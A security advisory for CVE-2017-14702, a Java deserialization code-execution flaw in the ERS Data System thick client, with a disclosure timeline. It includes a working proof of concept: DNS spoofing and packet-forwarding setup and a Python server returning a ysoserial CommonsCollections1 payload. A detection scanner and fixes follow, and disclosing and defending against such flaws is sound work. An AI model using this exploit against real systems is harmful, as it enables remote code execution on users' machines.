
CVE-2017-14702

Description

ERS Data System 1.8.1.0 / 4.0 allows remote attackers to execute arbitrary code, related to the deserialization of com.branaghgroup.ecers.update.UpdateRequest objects.

VulnerabilityType

Deserialization of Untrusted Data (CWE-502)

Vendor of Product

Environment Rating Scale (ERS), Branagh Information Group, Inc.

Affected Product Code Base

ERS Data System - 1.8.1.0

Affected Component

| Component | Hash |
| --- | --- |
| ecers_3.03.jar | 1b1758051d501fe610148e8b19b96825 |
| commons-collections_3.2.jar | 7b9216b608d550787bdf43a63d88bf3b |
| ecers_3.65.jar | b80fc66fa94b6dafa34a024577f12671 |

Attack Type

Remote

Impact

Code execution: true

Attack Vectors

Attackers can exploit this vulnerability by responding to the ERS thick client's HTTP requests with malicious serialized Java objects. The vulnerability can be triggered during authentication of the thick client or on subsequent requests to the ERS web service.

Reference

Product Website
Product Download

Discoverer

West Shepherd
wshepherd0010[at]gmail.com

Advisory ID

CVE-2017-14702

Report Timeline

| Date | Action |
| --- | --- |
| 9/21/2017 | Submitted CVE ID request to MITRE via web form; received email confirming submission. |
| 9/22/2017 | Received response from MITRE CVE assignment team; CVE ID reserved. |
| 9/25/2017 | Contacted vendor via contact form on website; no reply. |
| 9/27/2017 | Contacted vendor CEO via email offering to work with their development team to remediate the issue at no cost; no reply. |
| 9/29/2017 | Released advisory publicly without exploit code to allow vendor time to fix the issue. |
| 10/3/2017 | No contact from vendor. Released exploit code to validate vulnerability. |
| 1/4/2018 | Coordinated with vendor for follow-up assessment on updated code. |
| 1/17/2018 | Contacted vendor via email with report on findings. |

PoC

Exploit code publication pending on exploit-db.

# Exploit Title: ERS Data System 1.8.1 Deserialize Vulnerability
# Google Dork: N/A
# Date: 9/21/2017
# Exploit Author: West Shepherd
# Vendor Homepage: http://www.ersdata.com
# Software Link: www.ersdata.com/downloads/ErsSetup.exe
# Version: 1.8.1.0
# Tested on: Windows 7 x86
# CVE : CVE-2017-14702

# Description:
# ERS Data System 1.8.1.0 allows remote attackers to execute arbitrary code, related to the use of 
# com.branaghgroup.ecers.update.UpdateRequest deserialization.

# Exploitation:
# The ERS Data System thick client connects to the www.ersdata.com API via an unencrypted HTTP connection on TCP port 3311. 
# To redirect requests from the thick client to the attacking machine, enable packet forwarding:

#!/bin/bash
#echo 1 > /proc/sys/net/ipv4/ip_forward
#iptables -F INPUT
#iptables -F FORWARD
#iptables -F OUTPUT
#iptables -F -t nat
#iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
#iptables -t nat -A POSTROUTING -s 192.168.85.0/24 ! -d 192.168.85.0/24 -j MASQUERADE
#iptables -P INPUT ACCEPT
#iptables -P FORWARD ACCEPT
#iptables -P OUTPUT ACCEPT

# Then poison DNS requests to the www.ersdata.com domain:

# DNS Spoof https://github.com/devleoper/arp-dns-spoof
# root@kali:/usr/share/arp-dns-spoof# cat dns_packet_spoof.py | egrep "domain =|localIP ="
# domain = 'www.ersdata.com' # domain to be spoofed
# localIP = '192.168.85.131' # IP address for poisoned hosts.

# Run the request handler on the attacking machine, which will answer all requests with malicious serialized gadgets. For example:

#!/usr/bin/python
# Python 2 request handler: answers every POST from the thick client with the
# serialized CommonsCollections1 gadget chain generated by ysoserial.
import SocketServer
from SimpleHTTPServer import SimpleHTTPRequestHandler

PORT = 3311

# Payload generated with:
# java -jar ysoserial-master-v0.0.5-g1f2e7bf-14.jar CommonsCollections1 calc.exe > calc.bin
# python -c 'import binascii, re;print "\\x"+"\\x".join(re.findall("..",binascii.hexlify(open("calc.bin","rb").read())))'
# The three adjacent string literals below are concatenated by the Python parser.
PAYLOAD = (
	"\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78"
	"\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76"
	"\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x08\x63\x61\x6c\x63\x2e\x65\x78\x65\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a"
)

# POST handler: every POST from the client gets the serialized payload back.
class HTTPHandler(SimpleHTTPRequestHandler):
	def do_POST(self):
		self.send_response(200)
		self.send_header("Content-type", "text/html")
		self.send_header("Content-length", str(len(PAYLOAD)))
		self.end_headers()
		self.wfile.write(PAYLOAD)

if __name__ == "__main__":
	SocketServer.TCPServer.allow_reuse_address = True
	httpd = SocketServer.TCPServer(("", PORT), HTTPHandler)
	print "Serving at port: ", PORT
	try:
		httpd.serve_forever()
	except KeyboardInterrupt:
		print "Exiting..."
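The thick client accepts whatever the cleartext HTTP channel returns and hands it straight to Java deserialization, so the network-side telltale of the attack vector above is a response body that begins with the Java serialization stream header (0xACED 0005) and names the Commons Collections gadget classes. The following Python 3 scanner is an added example for a proxy or IDS check, not code from the advisory or from the ERS product. It walks a response body looking for TC_CLASSDESC and TC_PROXYCLASSDESC records and is a scanning heuristic rather than a full stream parser; the gadget class list and the sample bodies are constructed for illustration.

```python
#!/usr/bin/env python3
"""Heuristic check: does an HTTP response body carry a Java serialized
object, and which class descriptors does it name?  (Added example, not the
advisory's code.)  It recognises the stream header and looks for
TC_CLASSDESC / TC_PROXYCLASSDESC records; it is not a full parser."""
import struct

STREAM_MAGIC = b"\xac\xed"
STREAM_VERSION = 5
TC_CLASSDESC = 0x72       # then UTF class name + 8-byte serialVersionUID
TC_PROXYCLASSDESC = 0x7D  # then int count + count UTF interface names

# Classes used by the CommonsCollections gadget chains (the advisory's PoC
# serves ysoserial's CommonsCollections1). Illustrative assumption, not exhaustive.
GADGET_CLASSES = frozenset([
    "org.apache.commons.collections.functors.InvokerTransformer",
    "org.apache.commons.collections.functors.ChainedTransformer",
    "org.apache.commons.collections.functors.ConstantTransformer",
    "org.apache.commons.collections.map.LazyMap",
    "sun.reflect.annotation.AnnotationInvocationHandler",
])

_NAME_CHARS = frozenset(
    b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_.$[;")


def is_java_serialized(body: bytes) -> bool:
    """True when the body starts with STREAM_MAGIC 0xACED and STREAM_VERSION 5."""
    return (len(body) >= 4 and body[:2] == STREAM_MAGIC
            and struct.unpack(">H", body[2:4])[0] == STREAM_VERSION)


def _read_utf(buf: bytes, pos: int):
    """Read a 2-byte-length-prefixed class name at pos.
    Returns (name, next_pos), or (None, pos) if it does not look like one."""
    if pos + 2 > len(buf):
        return None, pos
    n = struct.unpack(">H", buf[pos:pos + 2])[0]
    raw = buf[pos + 2:pos + 2 + n]
    if not 1 <= n <= 512 or len(raw) != n or any(c not in _NAME_CHARS for c in raw):
        return None, pos
    return raw.decode("ascii"), pos + 2 + n


def extract_class_names(body: bytes) -> list:
    """Class / interface names from class descriptor records, in stream order."""
    names = []
    i = 4 if is_java_serialized(body) else 0
    while i < len(body):
        tag = body[i]
        if tag == TC_CLASSDESC:
            name, nxt = _read_utf(body, i + 1)
            if name is not None and nxt + 8 <= len(body):
                names.append(name)
                i = nxt + 8          # skip the serialVersionUID
                continue
        elif tag == TC_PROXYCLASSDESC and i + 5 <= len(body):
            count = struct.unpack(">I", body[i + 1:i + 5])[0]
            pos, found = i + 5, []
            for _ in range(min(count, 32)):
                name, pos = _read_utf(body, pos)
                if name is None:
                    break
                found.append(name)
            if found:
                names.extend(found)
                i = pos
                continue
        i += 1                       # not a descriptor here; keep scanning
    return names


def scan_response_body(body: bytes) -> dict:
    """Summary suitable for a proxy log line or an alert."""
    serialized = is_java_serialized(body)
    classes = extract_class_names(body) if serialized else []
    gadgets = [c for c in classes if c in GADGET_CLASSES]
    return {"serialized": serialized, "classes": classes, "gadgets": gadgets}


# --- constructed sample bodies (not captured traffic) ---
def _classdesc(name: str) -> bytes:
    """TC_CLASSDESC + UTF name + zeroed serialVersionUID, for the samples only."""
    raw = name.encode("ascii")
    return bytes([TC_CLASSDESC]) + struct.pack(">H", len(raw)) + raw + b"\x00" * 8

HEADER = STREAM_MAGIC + struct.pack(">H", STREAM_VERSION)
BENIGN_BODY = HEADER + b"\x73" + _classdesc("com.branaghgroup.ecers.update.UpdateRequest")
GADGET_BODY = (HEADER + b"\x73"
               + _classdesc("sun.reflect.annotation.AnnotationInvocationHandler")
               + b"\x7d" + struct.pack(">I", 1) + struct.pack(">H", 13) + b"java.util.Map"
               + b"\x73" + _classdesc("org.apache.commons.collections.map.LazyMap")
               + b"\x73" + _classdesc("org.apache.commons.collections.functors.InvokerTransformer"))
HTML_BODY = b"<html><body>login ok</body></html>"

if __name__ == "__main__":
    for label, body in [("benign", BENIGN_BODY), ("gadget", GADGET_BODY), ("html", HTML_BODY)]:
        print(label, scan_response_body(body))
```

On the wire, `serialized` being true for a login response is already unusual enough to log; a non-empty `gadgets` list is an alert. The durable fix sits in the client rather than on the network: move the API channel to TLS with certificate validation so a spoofed www.ersdata.com cannot answer at all, and restrict what `ObjectInputStream` will instantiate (an allow-list of expected classes such as the UpdateRequest type, via JEP 290 serialization filters or a `resolveClass` override) so that Commons Collections gadget classes are rejected before any code runs.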

PGP

Contact West Shepherd wshepherd0010[at]gmail.com
